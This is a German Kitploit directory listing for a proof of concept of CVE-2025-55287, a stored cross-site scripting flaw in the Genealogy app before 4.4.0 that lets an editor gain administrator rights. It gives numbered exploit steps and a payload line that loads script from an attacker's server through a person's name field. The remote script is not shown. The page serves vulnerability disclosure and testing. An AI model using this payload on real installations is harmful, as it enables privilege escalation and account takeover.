Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-55287-POC — Authentifiziertes gespeichertes XSS priv esc PoC. Betrifft Genealogy Versionen vor 4.4.0. | Kitploit
Tools/GitHubGitHub/eternalvalhalla/cve-2025-55287-poc
Privilege EscalationSchwachstellenanalyseExploitationWebanwendungs-ExploitationWebsicherheitPenetrationstests
GitHubeternalvalhalla/cve-2025-55287-poc

CVE-2025-55287-POC

Authentifiziertes gespeichertes XSS priv esc PoC. Betrifft Genealogy Versionen vor 4.4.0.

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Repository anzeigen
11vor 1 JahrNoch nicht geprüft

CVE-2025-55287-POC

Authentifiziertes gespeichertes Cross-Site Scripting (XSS) in der Genealogie-App vor Version 4.4.0 ermöglicht die Ausführung beliebigen JavaScripts und eine Rechteausweitung von der Editor+-Rolle zum Administrator.

Zusammenfassung
  • Vulnerability type: Stored Cross-Site Scripting (CWE-79)
  • Betroffene Komponente: Vorname und Nachname der Person („Person“).
  • Betroffene Versionen: Alle Versionen vor 4.4.0
  • Auswirkungen: Dauerhafte Ausführung von vom Angreifer bereitgestelltem JavaScript in den Browsern der Opfer; Session-Hijacking, CSRF über DOM, UI-Redress, Diebstahl von Anmeldeinformationen oder beliebige Aktionen als das Opfer.
  • Angriffsvektor: Authentifiziert (jede Rolle, die neue Personen anlegen kann – Editor+)
Exploiting

Ursache: Unzureichende serverseitige Bereinigung/Kodierung des Vornamens/Nachnamens der Person beim erfolgreichen Löschen der betroffenen Person durch einen Benutzer mit höheren Rechten.

PoC:

  1. Authentifizieren Sie sich an der Anwendung (Rolle Editor+).
  2. Erstellen Sie eine neue Person (muss nicht unbedingt einer Familie zugewiesen sein).
  3. Fügen Sie das JavaScript entweder als Vornamen oder Nachnamen der hinzugefügten Person ein: <script src='yourserver/poc.js'></script>
  4. Bearbeiten Sie die poc.js mit Ihrer E-Mail-Adresse im Platzhalter.
  5. Sobald ein privilegierter Benutzer versucht, die neu hinzugefügte Person zu löschen, erhalten Sie eine Einladung zur Plattform an die angegebene E-Mail-Adresse mit der Rolle Administrator.
Tool herunterladen